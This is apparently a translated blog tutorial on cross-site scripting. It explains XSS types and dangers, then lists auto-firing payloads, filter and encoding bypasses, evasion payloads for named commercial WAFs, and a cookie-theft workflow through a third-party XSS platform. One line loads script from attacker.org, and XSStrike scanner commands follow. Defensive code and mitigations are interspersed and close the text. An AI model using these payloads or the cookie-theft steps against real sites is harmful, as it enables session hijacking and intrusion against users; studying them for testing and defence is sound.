XSS (cross-site attack)

XSS vulnerability (cross-site scripting)

1. Introduction to XSS vulnerabilities

XSS, also known as CSS (Cross Site Script), is a cross-site scripting attack in which a malicious attacker inserts malicious script code into a web page. When a user browses the page, the script embedded in the page is executed, achieving the attacker's malicious purpose of attacking users.

XSS vulnerabilities usually arise when PHP output functions write JavaScript code into the HTML page, which is then executed by the user's browser. Therefore, the key to finding XSS vulnerabilities is to find output functions whose parameters are not filtered.
Common output functions are: echo, printf, print, print_r, sprintf, die, var_dump, var_export.

2. Principles of XSS

  • The attacker launches an XSS attack (injects JS code) against a vulnerable server.
  • The attacker tricks the victim into opening a URL on the compromised server.
  • The victim opens the URL in a web browser and the malicious script is executed.

3. XSS attack methods

  • Reflected XSS <non-persistent>: The attacker prepares the attack link in advance and has to trick the user into clicking it to trigger the XSS code (the server holds no such page or content). It commonly appears on search pages, and the vulnerable code is usually back-end code.
  • Stored XSS <persistent>: The code is stored in the server's database, for example by adding it to personal information or a published article. If there is no filtering, or the filtering is not strict, the code is stored on the server and executes every time a user visits the page. This kind of XSS is very dangerous and can easily lead to worms and large-scale cookie theft (there is also a DOM-type variant, but it is still counted as stored XSS).
  • DOM-type XSS: A vulnerability based on the Document Object Model (DOM). DOM is a platform- and language-independent interface that lets programs or scripts dynamically access and update a document's content, structure and style, and the result can become part of the displayed page. The DOM contains many objects, some of which can be influenced by the user, such as URL, location, referrer, etc. Client-side script can dynamically inspect and modify page content through the DOM; this does not rely on submitting data to the server, but takes data from the DOM on the client and executes it locally. If the data in the DOM is not strictly validated, a DOM XSS vulnerability results. It is usually handled by front-end browser code.

4. Dangers of XSS

1. Planting malware on the page (drive-by downloads).
2. Stealing user cookies.
3. DoS (denial of service) against the client browser.
4. Phishing attacks, including advanced phishing techniques.
5. Deleting target articles, maliciously tampering with data, framing others.
6. Hijacking the user's web behaviour, and even further penetration of the intranet.
7. Launching Web 2.0 worms.
8. Worm-style DDoS attacks.
9. Worm-style malware planting, ad fraud, traffic fraud, destruction of online data.
10. Other security issues.

5. How to use XSS

1. You need an XSS platform to collect cookies.

2. For reflected XSS, a link can be constructed; when the user clicks it, the user's cookie is sent to the XSS platform.

3. Steal the user's cookie and then use it.

Exploitation can be carried out through an XSS platform.

XSS platform usage

https://xss8.cc/bdstatic.com/?callback=project&act=create

6. Common XSS attack methods

Some commonly used tags and attributes

Most of the tags I list below can trigger JS code automatically without user interaction. In most cases we also want automatic triggering rather than waiting for the user to trigger it.

1. script tag

The <script> tag is used to define a client-side script, such as JavaScript.
<script>alert(1);</script>
<script>alert("xss");</script>

2. img tag

The <img> tag defines an image in an HTML page.
<img src=1 onerror=alert(1);>
<img src=1 onerror=alert("xss");>

3. input tag

The <input> tag specifies an input field in which the user can enter data.
The onfocus event fires when an object gains focus:
<input onfocus=alert(1);>

Compete for focus, thus triggering the onblur event:

<input onblur=alert(1) autofocus><input autofocus>

The autofocus attribute of the input tag specifies that the element should automatically gain focus when the page loads. You can automatically execute your own focus event through the autofocus attribute. This vector causes the focus to automatically jump to the input element and trigger the focus event without the user having to trigger it:

<input onfocus="alert(1);" autofocus>
" onclick=alert(1)>        this requires a click on the input box
" onmouseover=alert(1)>    requires the mouse to pass over the input box

4. details tag

The <details> tag provides an interactive control that the user can open or close, specifying additional details that are visible or hidden. The ontoggle event fires when the user opens or closes the <details> element:

<details ontoggle=alert(1);>

Use the open attribute of the details tag to trigger the ontoggle event, which can be triggered without the user having to click:

<details open ontoggle=alert(1);>

5. svg tag

The <svg> tag is used to embed SVG file code directly in an HTML page.
<svg onload=alert(1);>

6. select tag

The <select> tag creates a drop-down list.
<select onfocus=alert(1)></select>

The autofocus attribute specifies that the element should gain focus automatically when the page loads; this vector makes the focus jump to the element and fires the focus event without any action by the user:
<select onfocus=alert(1) autofocus>

7. iframe tag

The <iframe> tag creates an inline frame containing another document.

<iframe onload=alert(1);></iframe>

8. video tag

The <video> tag defines a video, such as a movie clip or other video stream.

<video><source onerror=alert(1)>

9. audio tag

The <audio> tag defines sound, such as music or other audio streams.

<audio src=x  onerror=alert(1);>

10. body tag

The <body> tag defines the body of the document.

<body onload=alert(1);>

The onscroll event fires when the element's scroll bar is scrolled. We can use line breaks and autofocus to trigger it automatically when the scroll bar moves, without the user having to click:

<body
onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

11. textarea tag

The <textarea> tag defines a multi-line text input control.

<textarea onfocus=alert(1); autofocus>

12. keygen tag

<keygen autofocus onfocus=alert(1)> // Firefox only

13. marquee tag

<marquee onstart=alert(1)></marquee> // does not work in Chrome; Firefox and IE both work

14. isindex tag

<isindex type=image src=1 onerror=alert(1)> // IE only

7. Common basic filtering methods

1. Space filtering

When spaces are filtered, we can use / in place of spaces:

Bypass with the comment sequence /**/, or with the / character alone:

<img/src="x"/onerror=alert(1);>

Alternatively:

<img/src="x"onerror=alert(1);>

2. Quote filtering

Inside an HTML tag we can omit the quotes. Inside JS we can use backticks in place of single and double quotes:

<img src=x onerror=alert(`xss`);>

3. Bracket filtering

When brackets are filtered, you can use throw to bypass them. The throw statement is used to throw an error when an error occurs.

<img src=x onerror="javascript:window.onerror=alert;throw 1">
<a onmouseover="javascript:window.onerror=alert;throw 1">

4. Keyword filtering

Case bypass

<sCRiPt>alert(1);</sCrIpT>
<ImG sRc=x onerRor=alert(1);>

Double write bypass

Some WAFs only replace a keyword once, replacing it with an empty string. In this case we can double-write the keyword to bypass the filter:

<scrscriptipt>alert(1);</scrscriptipt>
<imimgg srsrcc=x onerror=alert(1);>
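The following is an added example, not code from the original post: a small test harness a defender can run against their own keyword filter. It reproduces the single-pass filter described above, shows that the double-written and mixed-case payloads listed in this section survive it, and shows that even a case-insensitive filter repeated to a fixed point is still only a blacklist, since a handler that is not on the list (the ontoggle example from section 6) passes untouched. `KEYWORDS`, the three function names and the sample strings are assumptions made for this example.

```javascript
// Added example (not part of the original post): grading a keyword blacklist
// against the bypass payloads from this section. Inputs are constructed.

// Hypothetical blacklist used by the filter under test.
const KEYWORDS = ['script', 'onerror', 'onload'];

// Naive filter: each keyword is removed once, case-sensitively, exactly the
// behaviour the post attributes to some WAFs.
function stripKeywordsOnce(input, keywords = KEYWORDS) {
  let out = input;
  for (const kw of keywords) {
    out = out.split(kw).join('');
  }
  return out;
}

// Stronger filter: repeat case-insensitively until nothing changes, so
// removing one occurrence can no longer assemble a new one.
function stripKeywordsToFixpoint(input, keywords = KEYWORDS) {
  let prev;
  let out = input;
  do {
    prev = out;
    for (const kw of keywords) {
      out = out.replace(new RegExp(kw, 'gi'), '');
    }
  } while (out !== prev);
  return out;
}

// Detection-style check used to grade the filters: does the output still
// carry a script element or any on* event-handler attribute?
function stillContainsActiveContent(html) {
  return /<\s*script\b/i.test(html) || /\bon[a-z]+\s*=/i.test(html);
}

// Constructed samples taken from the payloads listed in this post.
const SAMPLES = [
  '<scrscriptipt>alert(1);</scrscriptipt>', // double write
  '<sCRiPt>alert(1);</sCrIpT>',             // case variation
  '<details open ontoggle=alert(1);>',      // handler absent from the blacklist
];

// Run every sample through both filters and report which ones still pass.
function gradeFilters(samples = SAMPLES) {
  return samples.map((s) => ({
    sample: s,
    onceStillActive: stillContainsActiveContent(stripKeywordsOnce(s)),
    fixpointStillActive: stillContainsActiveContent(stripKeywordsToFixpoint(s)),
  }));
}

console.log(JSON.stringify(gradeFilters(), null, 2));
```

The third sample is the point of the exercise: no amount of repetition fixes a blacklist that does not know the tag or handler, which is why the defence section at the end of this post starts with output encoding rather than filtering.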

5. String concatenation bypass

Using the eval() function

Like PHP's eval() function, JavaScript's eval() function can also calculate JavaScript strings and execute them as script code.

<img src="x" onerror="a='aler';b='t';c='(1)';eval(a+b+c)">
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
// In JS, backticks can replace single and double quotes

6. Encoding bypass

Unicode encoding bypass

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

javasc&#x72;&#x69;pt:alert(/xss/)     (the r and i are encoded)

<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">

URL encoding bypass

<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

ASCII code bypass

<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

Hex bypass

<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

Base64 bypass

<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

7. Filter url addresses

Use URL encoding

<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>

javasc&#x72;&#x69;pt:alert('xsshttp://')

Use an IP address

1. Decimal IP
<img src="x" onerror=document.location=`http://2130706433/`>

2. Octal IP
<img src="x" onerror=document.location=`http://0177.0.0.01/`>

3. Hex IP
<img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>

4. In an HTML tag, // can replace http://
<img src="x" onerror=document.location=`//www.baidu.com`>

5. Use \\
Note that under Windows, \ already has a special meaning as path notation, so \\ is the file protocol under Windows; only under Linux does it resolve to the current domain's protocol.

6. Use a full-width period (。) instead of the ASCII period
If you type a full-width Chinese period in the domain name, the browser automatically converts it to an ASCII period:
<img src="x" onerror="document.location=`http://www。baidu。com`">   // automatically redirects to Baidu

8. Single quote closure + htmlspecialchars function bypass

'onmouseover='alert(/xss/)

9. JavaScript pseudo-protocol

"><a href=javascript:alert(/xss/)>                  (for when on* handlers and <script> are filtered)

8. HttpOnly bypass

1. What is HttpOnly?

If the HttpOnly attribute is set on a cookie, the cookie cannot be read by JS scripts, which effectively prevents cookie theft through XSS. For a more detailed introduction, please search on Google.

2. Is the API supported by Java EE?

At present Sun has not released a corresponding API, but PHP and C# have implemented it. Those of us working in Java EE are rather frustrated; don't worry, there are workarounds below.

3. HttpOnly setting example

Java EE
response.setHeader("Set-Cookie", "cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

The meaning of the individual parameters will not be repeated here. Once set, the cookie cannot be read by a JS script, but it can still be read on the server with the following method:
Cookie cookies[] = request.getCookies();

C#
HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);
VB.NET
Dim myCookie As HttpCookie = new HttpCookie("myCookie")
myCookie.HttpOnly = True
Response.AppendCookie(myCookie)

But in .NET 1.1 you need to add it manually:
Response.Cookies[cookie].Path += ";HTTPOnly";

PHP4
header("Set-Cookie: hidden=value; httpOnly");
PHP5
setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);

The last parameter is the HttpOnly attribute.
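As an added example (not code from the original post), here is a check a defender can run over the headers above: it parses a Set-Cookie header, treats attribute names case-insensitively (so both the HTTPOnly and httpOnly spellings used in this section count), and reports which protective attributes are missing. `parseSetCookie`, `auditSetCookie` and `buildSessionCookie` are names chosen for this example; the choice to require Secure and SameSite alongside HttpOnly, and SameSite=Lax as the default, are assumptions. Keep in mind what HttpOnly does and does not do: it stops script from reading document.cookie, but script running in the page can still issue requests that the browser sends with the cookie attached, so it limits cookie theft rather than XSS itself.

```javascript
// Added example (not part of the original post): audit Set-Cookie headers for
// HttpOnly, Secure and SameSite. Sample headers are constructed from the
// Java EE and PHP4 lines above.

// Split "name=value; Attr1=v; Attr2" into a cookie object with lower-cased
// attribute names (attribute names are case-insensitive in Set-Cookie).
function parseSetCookie(header) {
  const parts = String(header).split(';').map((p) => p.trim()).filter((p) => p !== '');
  const eqName = parts[0].indexOf('=');
  const cookie = {
    name: eqName === -1 ? parts[0] : parts[0].slice(0, eqName).trim(),
    value: eqName === -1 ? '' : parts[0].slice(eqName + 1).trim(),
    attributes: {},
  };
  for (const part of parts.slice(1)) {
    const eq = part.indexOf('=');
    const key = (eq === -1 ? part : part.slice(0, eq)).trim().toLowerCase();
    const val = eq === -1 ? true : part.slice(eq + 1).trim();
    cookie.attributes[key] = val;
  }
  return cookie;
}

// Names of the attributes a session cookie should carry but does not.
function auditSetCookie(header) {
  const cookie = parseSetCookie(header);
  const missing = [];
  if (!('httponly' in cookie.attributes)) missing.push('HttpOnly');
  if (!('secure' in cookie.attributes)) missing.push('Secure');
  if (!('samesite' in cookie.attributes)) missing.push('SameSite');
  return { name: cookie.name, missing };
}

// Builds a header that passes the audit. Assumption: the site is served over
// HTTPS only, so Secure is always set; SameSite=Lax is the chosen default.
function buildSessionCookie(name, value, maxAgeSeconds) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Max-Age=${maxAgeSeconds}; Secure; HttpOnly; SameSite=Lax`;
}

// Constructed headers: the two examples from this section plus a hardened one.
const SAMPLE_HEADERS = [
  'cookiename=value; Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly',
  'hidden=value; httpOnly',
  buildSessionCookie('sid', 'abc 123', 3600),
];

for (const h of SAMPLE_HEADERS) {
  const { name, missing } = auditSetCookie(h);
  console.log(`${name}: ${missing.length === 0 ? 'ok' : 'missing ' + missing.join(', ')}`);
}
```

Both headers from the post set HttpOnly but neither sets Secure or SameSite, which the audit reports; the hardened header passes. The same parser can be pointed at real responses by reading the Set-Cookie header from a fetch or proxy log.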

9. Conventional waf bypass ideas

1. Tag syntax replacement

<scr<script>ipt>alert("XSS")</scr<script>ipt>
<script>alert("XSS")</script>
<script src="http://attacker.org/malicious.js"></script>

2. Special symbol interference

3. Change of submission method

4. Garbage data overflow

5. Encryption and decryption algorithm

6. Combine with other vulnerabilities to bypass

The following list contains bypassable WAFs, their payloads, and the related bypass techniques.

WAF: Cloudflare
Payload: <a"/onclick=(confirm)()>click
Bypass technique: non-space padding

WAF: Wordfence
Payload: <a/href=javascript&colon;alert()>click
Bypass technique: numeric character encoding

WAF: Barracuda
Payload: <a/href=Java%0a%0d%09script&colon;alert()>click
Bypass technique: numeric character encoding

WAF: Comodo
Payload: <d3v/onauxclick=(((confirm)))">click
Bypass technique: event handler missing from the blacklist, plus function-call obfuscation

WAF: F5
Payload: <d3v/onmouseleave=[2].some(confirm)>click
Bypass technique: event handler missing from the blacklist, plus function-call obfuscation

WAF: ModSecurity
Payload: <details/open/ontoggle=alert()>
Bypass technique: tag or event handler missing from the blacklist

WAF: dotdefender
Payload: <details/open/ontoggle=(confirm)()//
Bypass technique: closing tag and event handler missing from the blacklist, plus function-call obfuscation

10. Usage of the XSStrike tool

1. Test a web page using the GET method:

python xsstrike.py -u "http://example.com/search.php?q=query"

2. Test POST data:

python xsstrike.py -u "http://example.com/search.php" --data "q=query"
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"}' --json

3. Test URL path:

python xsstrike.py -u "http://example.com/search/form/query" --path

4. Crawl the target starting from the given page and test what it finds:

python xsstrike.py -u "http://example.com/page.php" --crawl

You can specify the crawl depth with -l (default 2):

python xsstrike.py -u "http://example.com/page.php" --crawl -l 3

5. If you want to test URLs in a file, or just want to add seeds for crawling, you can use the --seeds option:

python xsstrike.py --seeds urls.txt

6. Find hidden parameters:

Find hidden parameters by parsing HTML and brute force

python xsstrike.py -u "http://example.com/page.php" --params

7. Blind XSS: Use this parameter during crawling to insert xss code into each variable in each html form.

python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind

8. Fuzz testing – fuzzer

This fuzzer is designed to test filters and web application firewalls, and the delay can be set to 1 second using the -d option.

python xsstrike.py -u "http://example.com/search.php?q=query" --fuzzer

9. Skip DOM scanning

DOM XSS scanning can be skipped when crawling to save time

python xsstrike.py -u "http://example.com/search.php?q=query" --skip-dom

10. Update:

If run with the --update option, XSStrike checks for updates. If a newer version is available, XSStrike downloads the update and merges it into the current directory without overwriting other files.

python xsstrike.py --update

11. XSS defense measures

(1) Encoding: HTML-entity encode data entered by the user.

(2) Filtering: Remove DOM attributes uploaded by users, such as onerror, and remove user-uploaded style nodes, script nodes, iframe nodes, etc.

(3) Correction: Avoid HTML-entity encoding directly; convert through DOM parsing and correct unmatched DOM tags.
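The following is an added example, not code from the original post, for measure (1) above and for the javascript: pseudo-protocol and entity-encoded URL payloads in section 7: context-aware output encoding for text and attribute values, plus a URL-scheme allowlist for href values. `encodeForHtml`, `decodeEntities`, `safeUrl`, `renderLink` and `renderSearchResult` are names chosen for this example; the allowed scheme list and the rejection of protocol-relative // URLs are assumptions. Measures (2) and (3), which accept user-supplied HTML and strip dangerous nodes, need a real HTML parser and are not covered here.

```javascript
// Added example (not part of the original post): output encoding and href
// validation that turn the payloads from this post into inert text.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for an HTML text node or a double-quoted attribute value. Encoding
// '&' means an attacker's "&#97;..." arrives at the browser as literal text.
function encodeForHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Browsers decode character references inside attribute values before the
// URL is parsed, so an href validator must do the same. This is a simplified
// decoder: numeric references plus a few named ones.
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':' };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const code = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isNaN(code) || code > 0x10ffff ? m : String.fromCodePoint(code);
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? m : named;
  });
}

// Assumed allowlist of schemes an href may use.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Returns the URL if it is safe to place in href, otherwise null. Browsers
// strip ASCII tab/newline from URLs, so those are removed before checking.
function safeUrl(raw) {
  const normalised = decodeEntities(String(raw)).replace(/[\t\n\r]/g, '').trim();
  if (normalised === '') return null;
  if (normalised.startsWith('//')) return null; // protocol-relative: rejected (assumption)
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normalised);
  if (m === null) return normalised;            // relative URL, no scheme
  return ALLOWED_SCHEMES.has(m[1].toLowerCase() + ':') ? normalised : null;
}

// Build an anchor: href only when the URL passes, text always encoded.
function renderLink(text, href) {
  const url = safeUrl(href);
  const hrefAttr = url === null ? '' : ` href="${encodeForHtml(url)}"`;
  return `<a${hrefAttr}>${encodeForHtml(text)}</a>`;
}

// The reflected search page from section 3, rendered with encoding.
function renderSearchResult(query) {
  return `<p>Results for: ${encodeForHtml(query)}</p>`;
}

// Constructed inputs taken from payloads in this post.
console.log(renderSearchResult('<script>alert(1);</script>'));
console.log(renderLink('click', 'javasc&#x72;&#x69;pt:alert(/xss/)'));
console.log(renderLink('a & b', 'https://example.com/?x=1&y=2'));
```

For DOM-type XSS the equivalent rule is to assign user data with textContent (or setAttribute on a validated value) rather than innerHTML, so the browser never parses it as markup.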

Origin blog.csdn.net/huangyongkang666/article/details/123624164